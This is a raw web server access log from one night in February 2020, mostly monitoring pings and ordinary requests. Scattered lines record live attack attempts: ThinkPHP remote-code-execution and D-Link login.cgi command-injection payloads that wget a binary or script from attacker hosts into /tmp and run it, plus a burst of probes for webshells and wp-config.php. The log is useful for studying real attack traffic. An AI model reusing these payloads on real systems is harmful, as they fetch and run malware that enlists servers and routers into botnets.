212.91.246.72 - - [02/Feb/2020:23:08:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.254.59.113 - - [02/Feb/2020:23:08:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
212.91.246.72 - - [02/Feb/2020:23:09:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:10:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:11:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:12:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:13:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.35 - - [02/Feb/2020:23:13:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2020:23:14:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:15:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:16:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:17:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.35 - - [02/Feb/2020:23:18:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2020:23:18:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:19:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:20:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.87.153.5 - - [02/Feb/2020:23:20:54 +0100] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
212.91.246.72 - - [02/Feb/2020:23:21:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:22:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:23:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.20.74 - - [02/Feb/2020:23:24:19 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:23:24:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:25:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.80.103.79 - - [02/Feb/2020:23:25:40 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
83.97.20.33 - - [02/Feb/2020:23:26:19 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2020:23:26:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.35 - - [02/Feb/2020:23:26:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2020:23:27:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:28:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.31.120.43 - - [02/Feb/2020:23:29:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Feb/2020:23:29:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.69.191.98 - - [02/Feb/2020:23:29:39 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:23:30:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
190.122.156.110 - - [02/Feb/2020:23:30:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Feb/2020:23:31:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:32:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:33:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.88.83.87 - - [02/Feb/2020:23:34:17 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:23:34:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:35:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:36:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:37:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.24.70.160 - - [02/Feb/2020:23:37:39 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
212.91.246.72 - - [02/Feb/2020:23:38:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.137.132 - - [02/Feb/2020:23:39:26 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:23:39:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.119.24.187 - - [02/Feb/2020:23:39:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Feb/2020:23:40:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.249.177.213 - - [02/Feb/2020:23:40:52 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Feb/2020:23:41:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:42:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.156.219.164 - - [02/Feb/2020:23:43:26 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://2.56.8.156/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "DEMONS/2.0"
212.91.246.72 - - [02/Feb/2020:23:43:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.186.171.231 - - [02/Feb/2020:23:43:57 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.168.149.5/Dlinkrep.sh%20-O%20-%3E%20/tmp/kh;Dlinkrep.sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
171.100.12.210 - - [02/Feb/2020:23:44:01 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [02/Feb/2020:23:44:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.20.67 - - [02/Feb/2020:23:44:48 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:23:45:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:46:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:47:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.71.68.20 - - [02/Feb/2020:23:47:30 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:23:48:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:49:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
117.5.212.232 - - [02/Feb/2020:23:49:36 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
183.81.18.249 - - [02/Feb/2020:23:49:53 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:23:50:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.89.144.131 - - [02/Feb/2020:23:51:02 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 329 "-" "LMAO/2.0"
212.91.246.72 - - [02/Feb/2020:23:51:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.196.82.203 - - [02/Feb/2020:23:52:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:52:09 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:52:09 +0100] "POST /Admin50f65bd4/Login.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:52:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36"
146.196.82.203 - - [02/Feb/2020:23:52:14 +0100] "GET /l.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36"
146.196.82.203 - - [02/Feb/2020:23:52:14 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36"
146.196.82.203 - - [02/Feb/2020:23:52:15 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36"
146.196.82.203 - - [02/Feb/2020:23:52:15 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
146.196.82.203 - - [02/Feb/2020:23:52:19 +0100] "POST /bbs.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
146.196.82.203 - - [02/Feb/2020:23:52:26 +0100] "POST /forum.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
212.91.246.72 - - [02/Feb/2020:23:52:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.196.82.203 - - [02/Feb/2020:23:52:32 +0100] "POST /forums.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
146.196.82.203 - - [02/Feb/2020:23:52:38 +0100] "POST /bbs/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
146.196.82.203 - - [02/Feb/2020:23:52:46 +0100] "POST /forum/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
146.196.82.203 - - [02/Feb/2020:23:52:52 +0100] "POST /forums/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
146.196.82.203 - - [02/Feb/2020:23:52:58 +0100] "GET /webdav/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
146.196.82.203 - - [02/Feb/2020:23:52:58 +0100] "GET /help.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:52:59 +0100] "GET /java.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:52:59 +0100] "GET /_query.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:52:59 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:52:59 +0100] "GET /db_cts.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:00 +0100] "GET /db_pma.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:00 +0100] "GET /logon.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:00 +0100] "GET /help-e.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:00 +0100] "GET /license.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:00 +0100] "GET /log.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:01 +0100] "GET /hell.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:01 +0100] "GET /pmd_online.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:01 +0100] "GET /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:01 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:01 +0100] "GET /htdocs.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:02 +0100] "GET /b.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:02 +0100] "GET /sane.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:02 +0100] "GET /desktop.ini.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:02 +0100] "GET /z.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:03 +0100] "GET /lala.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:03 +0100] "GET /lala-dpr.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:03 +0100] "GET /wpc.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:03 +0100] "GET /wpo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:03 +0100] "GET /t6nv.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:04 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:04 +0100] "GET /text.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:04 +0100] "GET /wp-config.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:04 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:05 +0100] "GET /muhstik2.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:05 +0100] "GET /muhstiks.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:05 +0100] "GET /muhstik-dpr.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:05 +0100] "GET /lol.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:05 +0100] "GET /uploader.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:06 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:06 +0100] "GET /cmv.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:06 +0100] "GET /cmdd.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:06 +0100] "GET /knal.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:06 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:07 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:07 +0100] "GET /appserv.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:07 +0100] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
